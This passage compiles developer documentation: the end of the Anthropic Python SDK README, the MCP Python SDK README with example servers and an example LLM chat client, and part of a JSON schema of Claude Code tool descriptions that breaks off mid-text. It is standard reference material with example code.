[`LegacyAPIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_legacy_response.py) object. This is a legacy class as we're changing it slightly in the next major version. - -For the sync client this will mostly be the same with the exception -of `content` & `text` will be methods instead of properties. In the -async client, all methods will be async. - -A migration script will be provided & the migration in general should -be smooth. - -#### `.with_streaming_response` - -The above interface eagerly reads the full response body when you make the request, which may not always be what you want. - -To stream the response body, use `.with_streaming_response` instead, which requires a context manager and only reads the response body once you call `.read()`, `.text()`, `.json()`, `.iter_bytes()`, `.iter_text()`, `.iter_lines()` or `.parse()`. In the async client, these are async methods. - -As such, `.with_streaming_response` methods return a different [`APIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_response.py) object, and the async client returns an [`AsyncAPIResponse`](https://github.com/anthropics/anthropic-sdk-python/tree/main/src/anthropic/_response.py) object. - -```python -with client.messages.with_streaming_response.create( - max_tokens=1024, - messages=[ - { - "role": "user", - "content": "Hello, Claude", - } - ], - model="claude-3-5-sonnet-latest", -) as response: - print(response.headers.get("X-My-Header")) - - for line in response.iter_lines(): - print(line) -``` - -The context manager is required so that the response will reliably be closed. - -### Making custom/undocumented requests - -This library is typed for convenient access to the documented API. - -If you need to access undocumented endpoints, params, or response properties, the library can still be used. - -#### Undocumented endpoints - -To make requests to undocumented endpoints, you can make requests using `client.get`, `client.post`, and other -http verbs. Options on the client will be respected (such as retries) when making this request. - -```py -import httpx - -response = client.post( - "/foo", - cast_to=httpx.Response, - body={"my_param": True}, -) - -print(response.headers.get("x-foo")) -``` - -#### Undocumented request params - -If you want to explicitly send an extra param, you can do so with the `extra_query`, `extra_body`, and `extra_headers` request -options. - -#### Undocumented response properties - -To access undocumented response properties, you can access the extra fields like `response.unknown_prop`. You -can also get all the extra fields on the Pydantic model as a dict with -[`response.model_extra`](https://docs.pydantic.dev/latest/api/base_model/#pydantic.BaseModel.model_extra). - -### Configuring the HTTP client - -You can directly override the [httpx client](https://www.python-httpx.org/api/#client) to customize it for your use case, including: - -- Support for [proxies](https://www.python-httpx.org/advanced/proxies/) -- Custom [transports](https://www.python-httpx.org/advanced/transports/) -- Additional [advanced](https://www.python-httpx.org/advanced/clients/) functionality - -```python -import httpx -from anthropic import Anthropic, DefaultHttpxClient - -client = Anthropic( - # Or use the `ANTHROPIC_BASE_URL` env var - base_url="http://my.test.server.example.com:8083", - http_client=DefaultHttpxClient( - proxy="http://my.test.proxy.example.com", - transport=httpx.HTTPTransport(local_address="0.0.0.0"), - ), -) -``` - -You can also customize the client on a per-request basis by using `with_options()`: - -```python -client.with_options(http_client=DefaultHttpxClient(...)) -``` - -### Managing HTTP resources - -By default the library closes underlying HTTP connections whenever the client is [garbage collected](https://docs.python.org/3/reference/datamodel.html#object.__del__). You can manually close the client using the `.close()` method if desired, or with a context manager that closes when exiting. - -```py -from anthropic import Anthropic - -with Anthropic() as client: - # make requests here - ... - -# HTTP client is now closed -``` - -## Versioning - -This package generally follows [SemVer](https://semver.org/spec/v2.0.0.html) conventions, though certain backwards-incompatible changes may be released as minor versions: - -1. Changes that only affect static types, without breaking runtime behavior. -2. Changes to library internals which are technically public but not intended or documented for external use. _(Please open a GitHub issue to let us know if you are relying on such internals.)_ -3. Changes that we do not expect to impact the vast majority of users in practice. - -We take backwards-compatibility seriously and work hard to ensure you can rely on a smooth upgrade experience. - -We are keen for your feedback; please open an [issue](https://www.github.com/anthropics/anthropic-sdk-python/issues) with questions, bugs, or suggestions. - -### Determining the installed version - -If you've upgraded to the latest version but aren't seeing any new features you were expecting then your python environment is likely still using an older version. - -You can determine the version that is being used at runtime with: - -```py -import anthropic -print(anthropic.__version__) -``` - -## Requirements - -Python 3.8 or higher. - -## Contributing - -See [the contributing documentation](./CONTRIBUTING.md). -``` - - -MCP Python SDK README: -# MCP Python SDK - -
- -Python implementation of the Model Context Protocol (MCP) - -[![PyPI][pypi-badge]][pypi-url] -[![MIT licensed][mit-badge]][mit-url] -[![Python Version][python-badge]][python-url] -[![Documentation][docs-badge]][docs-url] -[![Specification][spec-badge]][spec-url] -[![GitHub Discussions][discussions-badge]][discussions-url] - -
- - -## Table of Contents - -- [MCP Python SDK](#mcp-python-sdk) - - [Overview](#overview) - - [Installation](#installation) - - [Adding MCP to your python project](#adding-mcp-to-your-python-project) - - [Running the standalone MCP development tools](#running-the-standalone-mcp-development-tools) - - [Quickstart](#quickstart) - - [What is MCP?](#what-is-mcp) - - [Core Concepts](#core-concepts) - - [Server](#server) - - [Resources](#resources) - - [Tools](#tools) - - [Prompts](#prompts) - - [Images](#images) - - [Context](#context) - - [Running Your Server](#running-your-server) - - [Development Mode](#development-mode) - - [Claude Desktop Integration](#claude-desktop-integration) - - [Direct Execution](#direct-execution) - - [Mounting to an Existing ASGI Server](#mounting-to-an-existing-asgi-server) - - [Examples](#examples) - - [Echo Server](#echo-server) - - [SQLite Explorer](#sqlite-explorer) - - [Advanced Usage](#advanced-usage) - - [Low-Level Server](#low-level-server) - - [Writing MCP Clients](#writing-mcp-clients) - - [MCP Primitives](#mcp-primitives) - - [Server Capabilities](#server-capabilities) - - [Documentation](#documentation) - - [Contributing](#contributing) - - [License](#license) - -[pypi-badge]: https://img.shields.io/pypi/v/mcp.svg -[pypi-url]: https://pypi.org/project/mcp/ -[mit-badge]: https://img.shields.io/pypi/l/mcp.svg -[mit-url]: https://github.com/modelcontextprotocol/python-sdk/blob/main/LICENSE -[python-badge]: https://img.shields.io/pypi/pyversions/mcp.svg -[python-url]: https://www.python.org/downloads/ -[docs-badge]: https://img.shields.io/badge/docs-modelcontextprotocol.io-blue.svg -[docs-url]: https://modelcontextprotocol.io -[spec-badge]: https://img.shields.io/badge/spec-spec.modelcontextprotocol.io-blue.svg -[spec-url]: https://spec.modelcontextprotocol.io -[discussions-badge]: https://img.shields.io/github/discussions/modelcontextprotocol/python-sdk -[discussions-url]: https://github.com/modelcontextprotocol/python-sdk/discussions - -## Overview - -The Model Context Protocol allows applications to provide context for LLMs in a standardized way, separating the concerns of providing context from the actual LLM interaction. This Python SDK implements the full MCP specification, making it easy to: - -- Build MCP clients that can connect to any MCP server -- Create MCP servers that expose resources, prompts and tools -- Use standard transports like stdio and SSE -- Handle all MCP protocol messages and lifecycle events - -## Installation - -### Adding MCP to your python project - -We recommend using [uv](https://docs.astral.sh/uv/) to manage your Python projects. - -If you haven't created a uv-managed project yet, create one: - - ```bash - uv init mcp-server-demo - cd mcp-server-demo - ``` - - Then add MCP to your project dependencies: - - ```bash - uv add "mcp[cli]" - ``` - -Alternatively, for projects using pip for dependencies: -```bash -pip install "mcp[cli]" -``` - -### Running the standalone MCP development tools - -To run the mcp command with uv: - -```bash -uv run mcp -``` - -## Quickstart - -Let's create a simple MCP server that exposes a calculator tool and some data: - -```python -# server.py -from mcp.server.fastmcp import FastMCP - -# Create an MCP server -mcp = FastMCP("Demo") - - -# Add an addition tool -@mcp.tool() -def add(a: int, b: int) -> int: - """Add two numbers""" - return a + b - - -# Add a dynamic greeting resource -@mcp.resource("greeting://{name}") -def get_greeting(name: str) -> str: - """Get a personalized greeting""" - return f"Hello, {name}!" -``` - -You can install this server in [Claude Desktop](https://claude.ai/download) and interact with it right away by running: -```bash -mcp install server.py -``` - -Alternatively, you can test it with the MCP Inspector: -```bash -mcp dev server.py -``` - -## What is MCP? - -The [Model Context Protocol (MCP)](https://modelcontextprotocol.io) lets you build servers that expose data and functionality to LLM applications in a secure, standardized way. Think of it like a web API, but specifically designed for LLM interactions. MCP servers can: - -- Expose data through **Resources** (think of these sort of like GET endpoints; they are used to load information into the LLM's context) -- Provide functionality through **Tools** (sort of like POST endpoints; they are used to execute code or otherwise produce a side effect) -- Define interaction patterns through **Prompts** (reusable templates for LLM interactions) -- And more! - -## Core Concepts - -### Server - -The FastMCP server is your core interface to the MCP protocol. It handles connection management, protocol compliance, and message routing: - -```python -# Add lifespan support for startup/shutdown with strong typing -from contextlib import asynccontextmanager -from collections.abc import AsyncIterator -from dataclasses import dataclass - -from fake_database import Database # Replace with your actual DB type - -from mcp.server.fastmcp import Context, FastMCP - -# Create a named server -mcp = FastMCP("My App") - -# Specify dependencies for deployment and development -mcp = FastMCP("My App", dependencies=["pandas", "numpy"]) - - -@dataclass -class AppContext: - db: Database - - -@asynccontextmanager -async def app_lifespan(server: FastMCP) -> AsyncIterator[AppContext]: - """Manage application lifecycle with type-safe context""" - # Initialize on startup - db = await Database.connect() - try: - yield AppContext(db=db) - finally: - # Cleanup on shutdown - await db.disconnect() - - -# Pass lifespan to server -mcp = FastMCP("My App", lifespan=app_lifespan) - - -# Access type-safe lifespan context in tools -@mcp.tool() -def query_db(ctx: Context) -> str: - """Tool that uses initialized resources""" - db = ctx.request_context.lifespan_context["db"] - return db.query() -``` - -### Resources - -Resources are how you expose data to LLMs. They're similar to GET endpoints in a REST API - they provide data but shouldn't perform significant computation or have side effects: - -```python -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("My App") - - -@mcp.resource("config://app") -def get_config() -> str: - """Static configuration data""" - return "App configuration here" - - -@mcp.resource("users://{user_id}/profile") -def get_user_profile(user_id: str) -> str: - """Dynamic user data""" - return f"Profile data for user {user_id}" -``` - -### Tools - -Tools let LLMs take actions through your server. Unlike resources, tools are expected to perform computation and have side effects: - -```python -import httpx -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("My App") - - -@mcp.tool() -def calculate_bmi(weight_kg: float, height_m: float) -> float: - """Calculate BMI given weight in kg and height in meters""" - return weight_kg / (height_m**2) - - -@mcp.tool() -async def fetch_weather(city: str) -> str: - """Fetch current weather for a city""" - async with httpx.AsyncClient() as client: - response = await client.get(f"https://api.weather.com/{city}") - return response.text -``` - -### Prompts - -Prompts are reusable templates that help LLMs interact with your server effectively: - -```python -from mcp.server.fastmcp import FastMCP -from mcp.server.fastmcp.prompts import base - -mcp = FastMCP("My App") - - -@mcp.prompt() -def review_code(code: str) -> str: - return f"Please review this code:\n\n{code}" - - -@mcp.prompt() -def debug_error(error: str) -> list[base.Message]: - return [ - base.UserMessage("I'm seeing this error:"), - base.UserMessage(error), - base.AssistantMessage("I'll help debug that. What have you tried so far?"), - ] -``` - -### Images - -FastMCP provides an `Image` class that automatically handles image data: - -```python -from mcp.server.fastmcp import FastMCP, Image -from PIL import Image as PILImage - -mcp = FastMCP("My App") - - -@mcp.tool() -def create_thumbnail(image_path: str) -> Image: - """Create a thumbnail from an image""" - img = PILImage.open(image_path) - img.thumbnail((100, 100)) - return Image(data=img.tobytes(), format="png") -``` - -### Context - -The Context object gives your tools and resources access to MCP capabilities: - -```python -from mcp.server.fastmcp import FastMCP, Context - -mcp = FastMCP("My App") - - -@mcp.tool() -async def long_task(files: list[str], ctx: Context) -> str: - """Process multiple files with progress tracking""" - for i, file in enumerate(files): - ctx.info(f"Processing {file}") - await ctx.report_progress(i, len(files)) - data, mime_type = await ctx.read_resource(f"file://{file}") - return "Processing complete" -``` - -## Running Your Server - -### Development Mode - -The fastest way to test and debug your server is with the MCP Inspector: - -```bash -mcp dev server.py - -# Add dependencies -mcp dev server.py --with pandas --with numpy - -# Mount local code -mcp dev server.py --with-editable . -``` - -### Claude Desktop Integration - -Once your server is ready, install it in Claude Desktop: - -```bash -mcp install server.py - -# Custom name -mcp install server.py --name "My Analytics Server" - -# Environment variables -mcp install server.py -v API_KEY=abc123 -v DB_URL=postgres://... -mcp install server.py -f .env -``` - -### Direct Execution - -For advanced scenarios like custom deployments: - -```python -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("My App") - -if __name__ == "__main__": - mcp.run() -``` - -Run it with: -```bash -python server.py -# or -mcp run server.py -``` - -### Mounting to an Existing ASGI Server - -You can mount the SSE server to an existing ASGI server using the `sse_app` method. This allows you to integrate the SSE server with other ASGI applications. - -```python -from starlette.applications import Starlette -from starlette.routing import Mount, Host -from mcp.server.fastmcp import FastMCP - - -mcp = FastMCP("My App") - -# Mount the SSE server to the existing ASGI server -app = Starlette( - routes=[ - Mount('/', app=mcp.sse_app()), - ] -) - -# or dynamically mount as host -app.router.routes.append(Host('mcp.acme.corp', app=mcp.sse_app())) -``` - -For more information on mounting applications in Starlette, see the [Starlette documentation](https://www.starlette.io/routing/#submounting-routes). - -## Examples - -### Echo Server - -A simple server demonstrating resources, tools, and prompts: - -```python -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("Echo") - - -@mcp.resource("echo://{message}") -def echo_resource(message: str) -> str: - """Echo a message as a resource""" - return f"Resource echo: {message}" - - -@mcp.tool() -def echo_tool(message: str) -> str: - """Echo a message as a tool""" - return f"Tool echo: {message}" - - -@mcp.prompt() -def echo_prompt(message: str) -> str: - """Create an echo prompt""" - return f"Please process this message: {message}" -``` - -### SQLite Explorer - -A more complex example showing database integration: - -```python -import sqlite3 - -from mcp.server.fastmcp import FastMCP - -mcp = FastMCP("SQLite Explorer") - - -@mcp.resource("schema://main") -def get_schema() -> str: - """Provide the database schema as a resource""" - conn = sqlite3.connect("database.db") - schema = conn.execute("SELECT sql FROM sqlite_master WHERE type='table'").fetchall() - return "\n".join(sql[0] for sql in schema if sql[0]) - - -@mcp.tool() -def query_data(sql: str) -> str: - """Execute SQL queries safely""" - conn = sqlite3.connect("database.db") - try: - result = conn.execute(sql).fetchall() - return "\n".join(str(row) for row in result) - except Exception as e: - return f"Error: {str(e)}" -``` - -## Advanced Usage - -### Low-Level Server - -For more control, you can use the low-level server implementation directly. This gives you full access to the protocol and allows you to customize every aspect of your server, including lifecycle management through the lifespan API: - -```python -from contextlib import asynccontextmanager -from collections.abc import AsyncIterator - -from fake_database import Database # Replace with your actual DB type - -from mcp.server import Server - - -@asynccontextmanager -async def server_lifespan(server: Server) -> AsyncIterator[dict]: - """Manage server startup and shutdown lifecycle.""" - # Initialize resources on startup - db = await Database.connect() - try: - yield {"db": db} - finally: - # Clean up on shutdown - await db.disconnect() - - -# Pass lifespan to server -server = Server("example-server", lifespan=server_lifespan) - - -# Access lifespan context in handlers -@server.call_tool() -async def query_db(name: str, arguments: dict) -> list: - ctx = server.request_context - db = ctx.lifespan_context["db"] - return await db.query(arguments["query"]) -``` - -The lifespan API provides: -- A way to initialize resources when the server starts and clean them up when it stops -- Access to initialized resources through the request context in handlers -- Type-safe context passing between lifespan and request handlers - -```python -import mcp.server.stdio -import mcp.types as types -from mcp.server.lowlevel import NotificationOptions, Server -from mcp.server.models import InitializationOptions - -# Create a server instance -server = Server("example-server") - - -@server.list_prompts() -async def handle_list_prompts() -> list[types.Prompt]: - return [ - types.Prompt( - name="example-prompt", - description="An example prompt template", - arguments=[ - types.PromptArgument( - name="arg1", description="Example argument", required=True - ) - ], - ) - ] - - -@server.get_prompt() -async def handle_get_prompt( - name: str, arguments: dict[str, str] | None -) -> types.GetPromptResult: - if name != "example-prompt": - raise ValueError(f"Unknown prompt: {name}") - - return types.GetPromptResult( - description="Example prompt", - messages=[ - types.PromptMessage( - role="user", - content=types.TextContent(type="text", text="Example prompt text"), - ) - ], - ) - - -async def run(): - async with mcp.server.stdio.stdio_server() as (read_stream, write_stream): - await server.run( - read_stream, - write_stream, - InitializationOptions( - server_name="example", - server_version="0.1.0", - capabilities=server.get_capabilities( - notification_options=NotificationOptions(), - experimental_capabilities={}, - ), - ), - ) - - -if __name__ == "__main__": - import asyncio - - asyncio.run(run()) -``` - -### Writing MCP Clients - -The SDK provides a high-level client interface for connecting to MCP servers: - -```python -from mcp import ClientSession, StdioServerParameters, types -from mcp.client.stdio import stdio_client - -# Create server parameters for stdio connection -server_params = StdioServerParameters( - command="python", # Executable - args=["example_server.py"], # Optional command line arguments - env=None, # Optional environment variables -) - - -# Optional: create a sampling callback -async def handle_sampling_message( - message: types.CreateMessageRequestParams, -) -> types.CreateMessageResult: - return types.CreateMessageResult( - role="assistant", - content=types.TextContent( - type="text", - text="Hello, world! from model", - ), - model="gpt-3.5-turbo", - stopReason="endTurn", - ) - - -async def run(): - async with stdio_client(server_params) as (read, write): - async with ClientSession( - read, write, sampling_callback=handle_sampling_message - ) as session: - # Initialize the connection - await session.initialize() - - # List available prompts - prompts = await session.list_prompts() - - # Get a prompt - prompt = await session.get_prompt( - "example-prompt", arguments={"arg1": "value"} - ) - - # List available resources - resources = await session.list_resources() - - # List available tools - tools = await session.list_tools() - - # Read a resource - content, mime_type = await session.read_resource("file://some/path") - - # Call a tool - result = await session.call_tool("tool-name", arguments={"arg1": "value"}) - - -if __name__ == "__main__": - import asyncio - - asyncio.run(run()) -``` - -### MCP Primitives - -The MCP protocol defines three core primitives that servers can implement: - -| Primitive | Control | Description | Example Use | -|-----------|-----------------------|-----------------------------------------------------|------------------------------| -| Prompts | User-controlled | Interactive templates invoked by user choice | Slash commands, menu options | -| Resources | Application-controlled| Contextual data managed by the client application | File contents, API responses | -| Tools | Model-controlled | Functions exposed to the LLM to take actions | API calls, data updates | - -### Server Capabilities - -MCP servers declare capabilities during initialization: - -| Capability | Feature Flag | Description | -|-------------|------------------------------|------------------------------------| -| `prompts` | `listChanged` | Prompt template management | -| `resources` | `subscribe`
`listChanged`| Resource exposure and updates | -| `tools` | `listChanged` | Tool discovery and execution | -| `logging` | - | Server logging configuration | -| `completion`| - | Argument completion suggestions | - -## Documentation - -- [Model Context Protocol documentation](https://modelcontextprotocol.io) -- [Model Context Protocol specification](https://spec.modelcontextprotocol.io) -- [Officially supported servers](https://github.com/modelcontextprotocol/servers) - -## Contributing - -We are passionate about supporting contributors of all levels of experience and would love to see you get involved in the project. See the [contributing guide](CONTRIBUTING.md) to get started. - -## License - -This project is licensed under the MIT License - see the LICENSE file for details. - - -MCP Python SDK example of an MCP client: -```py -import asyncio -import json -import logging -import os -import shutil -from contextlib import AsyncExitStack -from typing import Any - -import httpx -from dotenv import load_dotenv -from mcp import ClientSession, StdioServerParameters -from mcp.client.stdio import stdio_client - -# Configure logging -logging.basicConfig( - level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s" -) - - -class Configuration: - """Manages configuration and environment variables for the MCP client.""" - - def __init__(self) -> None: - """Initialize configuration with environment variables.""" - self.load_env() - self.api_key = os.getenv("LLM_API_KEY") - - @staticmethod - def load_env() -> None: - """Load environment variables from .env file.""" - load_dotenv() - - @staticmethod - def load_config(file_path: str) -> dict[str, Any]: - """Load server configuration from JSON file. - - Args: - file_path: Path to the JSON configuration file. - - Returns: - Dict containing server configuration. - - Raises: - FileNotFoundError: If configuration file doesn't exist. - JSONDecodeError: If configuration file is invalid JSON. - """ - with open(file_path, "r") as f: - return json.load(f) - - @property - def llm_api_key(self) -> str: - """Get the LLM API key. - - Returns: - The API key as a string. - - Raises: - ValueError: If the API key is not found in environment variables. - """ - if not self.api_key: - raise ValueError("LLM_API_KEY not found in environment variables") - return self.api_key - - -class Server: - """Manages MCP server connections and tool execution.""" - - def __init__(self, name: str, config: dict[str, Any]) -> None: - self.name: str = name - self.config: dict[str, Any] = config - self.stdio_context: Any | None = None - self.session: ClientSession | None = None - self._cleanup_lock: asyncio.Lock = asyncio.Lock() - self.exit_stack: AsyncExitStack = AsyncExitStack() - - async def initialize(self) -> None: - """Initialize the server connection.""" - command = ( - shutil.which("npx") - if self.config["command"] == "npx" - else self.config["command"] - ) - if command is None: - raise ValueError("The command must be a valid string and cannot be None.") - - server_params = StdioServerParameters( - command=command, - args=self.config["args"], - env={**os.environ, **self.config["env"]} - if self.config.get("env") - else None, - ) - try: - stdio_transport = await self.exit_stack.enter_async_context( - stdio_client(server_params) - ) - read, write = stdio_transport - session = await self.exit_stack.enter_async_context( - ClientSession(read, write) - ) - await session.initialize() - self.session = session - except Exception as e: - logging.error(f"Error initializing server {self.name}: {e}") - await self.cleanup() - raise - - async def list_tools(self) -> list[Any]: - """List available tools from the server. - - Returns: - A list of available tools. - - Raises: - RuntimeError: If the server is not initialized. - """ - if not self.session: - raise RuntimeError(f"Server {self.name} not initialized") - - tools_response = await self.session.list_tools() - tools = [] - - for item in tools_response: - if isinstance(item, tuple) and item[0] == "tools": - for tool in item[1]: - tools.append(Tool(tool.name, tool.description, tool.inputSchema)) - - return tools - - async def execute_tool( - self, - tool_name: str, - arguments: dict[str, Any], - retries: int = 2, - delay: float = 1.0, - ) -> Any: - """Execute a tool with retry mechanism. - - Args: - tool_name: Name of the tool to execute. - arguments: Tool arguments. - retries: Number of retry attempts. - delay: Delay between retries in seconds. - - Returns: - Tool execution result. - - Raises: - RuntimeError: If server is not initialized. - Exception: If tool execution fails after all retries. - """ - if not self.session: - raise RuntimeError(f"Server {self.name} not initialized") - - attempt = 0 - while attempt < retries: - try: - logging.info(f"Executing {tool_name}...") - result = await self.session.call_tool(tool_name, arguments) - - return result - - except Exception as e: - attempt += 1 - logging.warning( - f"Error executing tool: {e}. Attempt {attempt} of {retries}." - ) - if attempt < retries: - logging.info(f"Retrying in {delay} seconds...") - await asyncio.sleep(delay) - else: - logging.error("Max retries reached. Failing.") - raise - - async def cleanup(self) -> None: - """Clean up server resources.""" - async with self._cleanup_lock: - try: - await self.exit_stack.aclose() - self.session = None - self.stdio_context = None - except Exception as e: - logging.error(f"Error during cleanup of server {self.name}: {e}") - - -class Tool: - """Represents a tool with its properties and formatting.""" - - def __init__( - self, name: str, description: str, input_schema: dict[str, Any] - ) -> None: - self.name: str = name - self.description: str = description - self.input_schema: dict[str, Any] = input_schema - - def format_for_llm(self) -> str: - """Format tool information for LLM. - - Returns: - A formatted string describing the tool. - """ - args_desc = [] - if "properties" in self.input_schema: - for param_name, param_info in self.input_schema["properties"].items(): - arg_desc = ( - f"- {param_name}: {param_info.get('description', 'No description')}" - ) - if param_name in self.input_schema.get("required", []): - arg_desc += " (required)" - args_desc.append(arg_desc) - - return f""" -Tool: {self.name} -Description: {self.description} -Arguments: -{chr(10).join(args_desc)} -""" - - -class LLMClient: - """Manages communication with the LLM provider.""" - - def __init__(self, api_key: str) -> None: - self.api_key: str = api_key - - def get_response(self, messages: list[dict[str, str]]) -> str: - """Get a response from the LLM. - - Args: - messages: A list of message dictionaries. - - Returns: - The LLM's response as a string. - - Raises: - httpx.RequestError: If the request to the LLM fails. - """ - url = "https://api.groq.com/openai/v1/chat/completions" - - headers = { - "Content-Type": "application/json", - "Authorization": f"Bearer {self.api_key}", - } - payload = { - "messages": messages, - "model": "llama-3.2-90b-vision-preview", - "temperature": 0.7, - "max_tokens": 4096, - "top_p": 1, - "stream": False, - "stop": None, - } - - try: - with httpx.Client() as client: - response = client.post(url, headers=headers, json=payload) - response.raise_for_status() - data = response.json() - return data["choices"][0]["message"]["content"] - - except httpx.RequestError as e: - error_message = f"Error getting LLM response: {str(e)}" - logging.error(error_message) - - if isinstance(e, httpx.HTTPStatusError): - status_code = e.response.status_code - logging.error(f"Status code: {status_code}") - logging.error(f"Response details: {e.response.text}") - - return ( - f"I encountered an error: {error_message}. " - "Please try again or rephrase your request." - ) - - -class ChatSession: - """Orchestrates the interaction between user, LLM, and tools.""" - - def __init__(self, servers: list[Server], llm_client: LLMClient) -> None: - self.servers: list[Server] = servers - self.llm_client: LLMClient = llm_client - - async def cleanup_servers(self) -> None: - """Clean up all servers properly.""" - cleanup_tasks = [] - for server in self.servers: - cleanup_tasks.append(asyncio.create_task(server.cleanup())) - - if cleanup_tasks: - try: - await asyncio.gather(*cleanup_tasks, return_exceptions=True) - except Exception as e: - logging.warning(f"Warning during final cleanup: {e}") - - async def process_llm_response(self, llm_response: str) -> str: - """Process the LLM response and execute tools if needed. - - Args: - llm_response: The response from the LLM. - - Returns: - The result of tool execution or the original response. - """ - import json - - try: - tool_call = json.loads(llm_response) - if "tool" in tool_call and "arguments" in tool_call: - logging.info(f"Executing tool: {tool_call['tool']}") - logging.info(f"With arguments: {tool_call['arguments']}") - - for server in self.servers: - tools = await server.list_tools() - if any(tool.name == tool_call["tool"] for tool in tools): - try: - result = await server.execute_tool( - tool_call["tool"], tool_call["arguments"] - ) - - if isinstance(result, dict) and "progress" in result: - progress = result["progress"] - total = result["total"] - percentage = (progress / total) * 100 - logging.info( - f"Progress: {progress}/{total} " - f"({percentage:.1f}%)" - ) - - return f"Tool execution result: {result}" - except Exception as e: - error_msg = f"Error executing tool: {str(e)}" - logging.error(error_msg) - return error_msg - - return f"No server found with tool: {tool_call['tool']}" - return llm_response - except json.JSONDecodeError: - return llm_response - - async def start(self) -> None: - """Main chat session handler.""" - try: - for server in self.servers: - try: - await server.initialize() - except Exception as e: - logging.error(f"Failed to initialize server: {e}") - await self.cleanup_servers() - return - - all_tools = [] - for server in self.servers: - tools = await server.list_tools() - all_tools.extend(tools) - - tools_description = "\n".join([tool.format_for_llm() for tool in all_tools]) - - system_message = ( - "You are a helpful assistant with access to these tools:\n\n" - f"{tools_description}\n" - "Choose the appropriate tool based on the user's question. " - "If no tool is needed, reply directly.\n\n" - "IMPORTANT: When you need to use a tool, you must ONLY respond with " - "the exact JSON object format below, nothing else:\n" - "{\n" - ' "tool": "tool-name",\n' - ' "arguments": {\n' - ' "argument-name": "value"\n' - " }\n" - "}\n\n" - "After receiving a tool's response:\n" - "1. Transform the raw data into a natural, conversational response\n" - "2. Keep responses concise but informative\n" - "3. Focus on the most relevant information\n" - "4. Use appropriate context from the user's question\n" - "5. Avoid simply repeating the raw data\n\n" - "Please use only the tools that are explicitly defined above." - ) - - messages = [{"role": "system", "content": system_message}] - - while True: - try: - user_input = input("You: ").strip().lower() - if user_input in ["quit", "exit"]: - logging.info("\nExiting...") - break - - messages.append({"role": "user", "content": user_input}) - - llm_response = self.llm_client.get_response(messages) - logging.info("\nAssistant: %s", llm_response) - - result = await self.process_llm_response(llm_response) - - if result != llm_response: - messages.append({"role": "assistant", "content": llm_response}) - messages.append({"role": "system", "content": result}) - - final_response = self.llm_client.get_response(messages) - logging.info("\nFinal response: %s", final_response) - messages.append( - {"role": "assistant", "content": final_response} - ) - else: - messages.append({"role": "assistant", "content": llm_response}) - - except KeyboardInterrupt: - logging.info("\nExiting...") - break - - finally: - await self.cleanup_servers() - - -async def main() -> None: - """Initialize and run the chat session.""" - config = Configuration() - server_config = config.load_config("servers_config.json") - servers = [ - Server(name, srv_config) - for name, srv_config in server_config["mcpServers"].items() - ] - llm_client = LLMClient(config.llm_api_key) - chat_session = ChatSession(servers, llm_client) - await chat_session.start() - - -if __name__ == "__main__": - asyncio.run(main()) -``` - - - - -JSON schema for Claude Code tools available via MCP: -```json -{ - "jsonrpc": "2.0", - "id": 1, - "result": { - "tools": [ - { - "name": "dispatch_agent", - "description": "Launch a new task", - "inputSchema": { - "type": "object", - "properties": { - "prompt": { - "type": "string", - "description": "The task for the agent to perform" - } - }, - "required": [ - "prompt" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "Bash", - "description": "Run shell command", - "inputSchema": { - "type": "object", - "properties": { - "command": { - "type": "string", - "description": "The command to execute" - }, - "timeout": { - "type": "number", - "description": "Optional timeout in milliseconds (max 600000)" - }, - "description": { - "type": "string", - "description": " Clear, concise description of what this command does in 5-10 words. Examples:\nInput: ls\nOutput: Lists files in current directory\n\nInput: git status\nOutput: Shows working tree status\n\nInput: npm install\nOutput: Installs package dependencies\n\nInput: mkdir foo\nOutput: Creates directory 'foo'" - } - }, - "required": [ - "command" - ], - "additionalProperties": false, - "$schema": "http://json-schema.org/draft-07/schema#" - } - }, - { - "name": "BatchTool", - "description": "\n- Batch execution tool that runs multiple tool invocations in a single request\n- Tools are executed in parallel when possible, and otherwise serially\n- Takes a list of tool invocations (tool_name and input pairs)\n- Returns the collected results from all invocations\n- Use this tool when you need to run multiple independent tool operations at once -- it is awesome for speeding up your workflow, reducing both context usage and latency\n- Each tool will respect its own permissions and validation rules\n- The tool's outputs are NOT shown to the user; to answer the user's query, you MUST send a message with the results after the tool call completes, otherwise the user will not see the results\n\nAvailable tools:\nTool: dispatch_agent\nArguments: prompt: string \"The task for the agent to perform\"\nUsage: Launch a new agent that has access to the following tools: View, GlobTool, GrepTool, LS, ReadNotebook, WebFetchTool. When you are searching for a keyword or file and are not confident that you will find the right match in the first few tries, use the Agent tool to perform the search for you.\n\nWhen to use the Agent tool:\n- If you are searching for a keyword like \"config\" or \"logger\", or for questions like \"which file does X?\", the Agent tool is strongly recommended\n\nWhen NOT to use the Agent tool:\n- If you want to read a specific file path, use the View or GlobTool tool instead of the Agent tool, to find the match more quickly\n- If you are searching for a specific class definition like \"class Foo\", use the GlobTool tool instead, to find the match more quickly\n- If you are searching for code within a specific file or set of 2-3 files, use the View tool instead of the Agent tool, to find the match more quickly\n\nUsage notes:\n1. Launch multiple agents concurrently whenever possible, to maximize performance; to do that, use a single message with multiple tool uses\n2. When the agent is done, it will return a single message back to you. The result returned by the agent is not visible to the user. To show the user the result, you should send a text message back to the user with a concise summary of the result.\n3. Each agent invocation is stateless. You will not be able to send additional messages to the agent, nor will the agent be able to communicate with you outside of its final report. Therefore, your prompt should contain a highly detailed task description for the agent to perform autonomously and you should specify exactly what information the agent should return back to you in its final and only message to you.\n4. The agent's outputs should generally be trusted\n5. IMPORTANT: The agent can not use Bash, Replace, Edit, NotebookEditCell, so can not modify files. If you want to use these tools, use them directly instead of going through the agent.\n---Tool: Bash\nArguments: command: string \"The command to execute\", [optional] timeout: number \"Optional timeout in milliseconds (max 600000)\", [optional] description: string \" Clear, concise description of what this command does in 5-10 words. Examples:\nInput: ls\nOutput: Lists files in current directory\n\nInput: git status\nOutput: Shows working tree status\n\nInput: npm install\nOutput: Installs package dependencies\n\nInput: mkdir foo\nOutput: Creates directory 'foo'\"\nUsage: Executes a given bash command in a persistent shell session with optional timeout, ensuring proper handling and security measures.\n\nBefore executing the command, please follow these steps:\n\n1. Directory Verification:\n - If the command will create new directories or files, first use the LS tool to verify the parent directory exists and is the correct location\n - For 